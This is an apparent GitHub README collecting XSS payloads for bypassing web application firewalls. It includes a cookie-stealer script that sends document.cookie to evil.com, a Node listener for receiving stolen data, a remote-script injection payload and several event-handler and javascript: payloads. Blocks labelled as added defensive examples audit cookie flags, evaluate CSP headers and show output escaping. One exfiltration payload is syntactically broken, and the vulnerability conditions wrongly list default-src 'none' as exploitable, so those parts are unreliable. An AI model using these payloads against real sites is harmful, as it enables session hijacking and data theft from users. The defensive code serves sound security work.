# basedygt/AwesomeXSS

Some collection of xss payloads that worked for me to bypass wafs

## Cookie Stealer Example

- GET based interception (easiest and best to show PoC):

```javascript
// XSS cookie stealer POC
var cookie = encodeURIComponent(document.cookie);
var url = 'https://evil.com/index.html/?victim_cookie=' + cookie;
window.location.href = url;
```
- POST based interception (I am not responsible for what you do with this info):
  1. Get SSL certificates for your malicious domain: `sudo certbot certonly --standalone -d domain.tld`
  2. Set up the listener with the SSL certificates:
```javascript
const https = require('https');
const fs = require('fs');

// Load the certificate and key
const cert = fs.readFileSync('cert.pem');
const key = fs.readFileSync('privkey.pem');

// Create the HTTPS server
const server = https.createServer({ cert, key }, (req, res) => {
  if (req.method === 'POST') {
    let data = '';
    req.on('data', (chunk) => {
      data += chunk;
    });
    req.on('end', () => {
      console.log(`Received data: ${data}`);
      res.writeHead(200, { 'Content-Type': 'text/plain' });
      res.end('Data received successfully!');
    });
  } else {
    res.writeHead(405, { 'Content-Type': 'text/plain' });
    res.end('Method not allowed!');
  }
});

// Listen on port 8080
server.listen(8080, () => {
  console.log('Server listening on port 8080');
});
```
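Both interception variants above only work if the session cookie is readable from `document.cookie`, i.e. it was set without `HttpOnly`. The following is an added defensive example, not code from this repository: it audits `Set-Cookie` header values for the attributes that blunt cookie theft (`HttpOnly`, `Secure`, `SameSite`) and shows how a hardened value looks. The cookie names and values are constructed for the demo.

```javascript
// Added example (not part of AwesomeXSS): audit Set-Cookie headers for the
// attributes that stop a document.cookie exfiltration payload from working.
// Sample cookie names/values are constructed for this demo.

// Parse one Set-Cookie value into its cookie name and a lowercase attribute map.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const attributes = {};
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, attributes };
}

// Return findings for a session cookie; an empty list means it is hardened.
function auditSetCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in attributes)) {
    findings.push(`${name}: readable via document.cookie (missing HttpOnly)`);
  }
  if (!('secure' in attributes)) {
    findings.push(`${name}: may be sent over plaintext HTTP (missing Secure)`);
  }
  const sameSite = String(attributes.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push(`${name}: SameSite is not Lax or Strict`);
  }
  return findings;
}

// Build a Set-Cookie value that passes the audit above.
function secureCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Run the audit over a batch of Set-Cookie headers and flatten the findings.
function auditHeaders(setCookieHeaders) {
  return setCookieHeaders.flatMap(auditSetCookie);
}

// Constructed sample headers: one weak, one partially hardened, one hardened.
const SAMPLE_HEADERS = [
  'sessionid=abc123; Path=/',
  'csrftoken=xyz; Path=/; Secure; SameSite=Strict',
  secureCookie('sessionid', 'abc123'),
];

for (const h of SAMPLE_HEADERS) {
  const findings = auditSetCookie(h);
  console.log(h, '=>', findings.length ? findings : 'ok');
}
```

Run it with `node` to see the weak header flagged three times, the partially hardened one once (still readable by script), and the `secureCookie` output pass cleanly.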

## Payloads

1. Inject external JavaScript without a `<script>` tag:

```html
<img src=x onerror="var script = document.createElement('script'); script.src = 'https://basedygt.github.io/xss.js'; document.head.appendChild(script);">
```

2. Data exfiltration through image source (when CSP is disabled):

```html
<img src="https://evil.com/?data=" + encodeURIComponent(document.cookie)">
```

### Vulnerable when

- Absence of a Content-Security-Policy header in the response
- Presence of a Content-Security-Policy header with a value of `default-src` or `none`
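To check the conditions in the list above from the defender's side, the following added example (not part of this repository) parses a response's `Content-Security-Policy` value and decides whether an injected `<img>` could beacon to an arbitrary external origin. Per the CSP fallback rule, image loads are governed by `img-src`, falling back to `default-src`; when neither is present, or the list contains `*`, `https:` or `http:`, the load is allowed. The sample policies are constructed.

```javascript
// Added example (not part of AwesomeXSS): evaluate a CSP header for whether an
// injected image could load from an attacker-chosen origin. Sample policies
// below are constructed for the demo.

// Parse "directive src src; directive src" into a map of lowercase directive
// names to lowercase source expressions.
function parseCsp(header) {
  const directives = {};
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return directives;
}

// Does this source list permit a request to an unknown external origin?
function allowsArbitraryOrigin(sources) {
  // An empty list (or 'none') blocks everything; host allow-lists block too.
  return sources.some((s) => s === '*' || s === 'https:' || s === 'http:');
}

// True if an image beacon to an attacker-controlled origin would be loaded.
function imageExfilPossible(cspHeader) {
  if (!cspHeader) return true;                    // no CSP header at all
  const d = parseCsp(cspHeader);
  let sources = d['img-src'];
  if (sources === undefined) sources = d['default-src'];
  if (sources === undefined) return true;         // policy says nothing about images
  return allowsArbitraryOrigin(sources);
}

// Constructed sample responses, from most to least exposed.
const SAMPLE_POLICIES = [
  null,
  "script-src 'self'",
  "default-src 'self'; img-src *",
  "default-src 'self'; img-src 'self' https:",
  "default-src 'self'",
  "default-src 'self'; img-src 'self' https://cdn.example.com",
  "default-src 'none'",
];

for (const p of SAMPLE_POLICIES) {
  console.log(JSON.stringify(p), '=> image exfil possible:', imageExfilPossible(p));
}
```

Note that `default-src 'none'` is reported as blocking: with no `img-src`, image loads fall back to `default-src`, and `'none'` matches nothing.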
3. CSS-based XSS:

```css
body { background-image: url('javascript:alert("XSS")'); }
```

4. SVG XSS:

```html
<svg/onload=alert(document.domain)>
```

5. Event handlers to execute the payload:

```html
<button onclick="alert('XSS')">Click Me</button>
```

6. JavaScript protocol handler:

```html
<a href="javascript:alert('XSS')">Click Me</a>
```
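The SVG, event-handler and `javascript:` payloads above all rely on untrusted input being written into HTML markup or into an `href` without context-aware encoding. The following added example (not code from this repository) shows the two server-side controls that neutralise them: HTML entity encoding for text and attribute contexts, and a URL scheme allow-list for `href` values that normalises the tab/newline and case tricks browsers tolerate. `safeHref` and `renderLink` are hypothetical helper names; the inputs are constructed.

```javascript
// Added example (not part of AwesomeXSS): context-aware output encoding and a
// URL scheme allow-list, the controls that defeat markup and javascript: payloads.
// Helper names are hypothetical; sample inputs are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for HTML text and double-quoted attribute contexts so that injected
// tags (<svg ...>, <button onclick=...>) render as literal text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Return the URL if its scheme is allowed (or it is relative), else null.
// Browsers strip ASCII tab/newline and surrounding whitespace when parsing a
// URL, so "java\tscript:" or " JAVASCRIPT:" still execute; normalise first.
function safeHref(raw) {
  const cleaned = String(raw).replace(/[\t\n\r]/g, '').trim();
  const match = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (match === null) return cleaned;            // relative URL, no scheme
  const scheme = match[1].toLowerCase() + ':';
  return ALLOWED_SCHEMES.has(scheme) ? cleaned : null;
}

// Render an anchor from untrusted href and label; rejected URLs become "#".
function renderLink(href, label) {
  const url = safeHref(href);
  const target = url === null ? '#' : escapeHtml(url);
  return `<a href="${target}">${escapeHtml(label)}</a>`;
}

// Constructed inputs modelled on the payload list above.
const SAMPLES = [
  ['https://example.com/?a=1&b=2', '<b>bold</b>'],
  ['javascript:alert(\'XSS\')', 'Click Me'],
  [' JaVaScRiPt:alert(1)', 'Click Me'],
  ['java\tscript:alert(1)', 'Click Me'],
  ['/profile', '<svg/onload=alert(document.domain)>'],
];

for (const [href, label] of SAMPLES) {
  console.log(renderLink(href, label));
}
```

`escapeHtml` is enough for HTML text and quoted attribute values; unquoted attributes, JavaScript strings and CSS contexts each need their own encoder, which is why a single "sanitise on input" filter is what these payloads bypass.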
